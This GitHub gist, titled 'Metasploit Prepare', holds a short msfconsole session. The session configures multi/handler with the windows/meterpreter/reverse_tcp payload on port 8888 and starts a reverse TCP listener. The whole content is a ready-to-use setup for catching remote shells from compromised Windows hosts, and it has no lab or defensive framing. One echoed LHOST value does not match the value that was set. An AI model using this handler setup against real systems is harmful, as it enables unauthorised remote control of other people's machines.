Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hypery2k/e5a8335b67c2c3af8ca9c1b0ebe11ad3 to your computer and use it in GitHub Desktop.
Save hypery2k/e5a8335b67c2c3af8ca9c1b0ebe11ad3 to your computer and use it in GitHub Desktop.
Metasploit Prepare
> msfconsole
=[ metasploit v4.16.58-dev ]
+ -- --=[ 1769 exploits - 1007 auxiliary - 307 post ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf exploit(multi/handler) > set LHOST "0.0.0.0"
LHOST => 192.168.69.20
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:8888
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment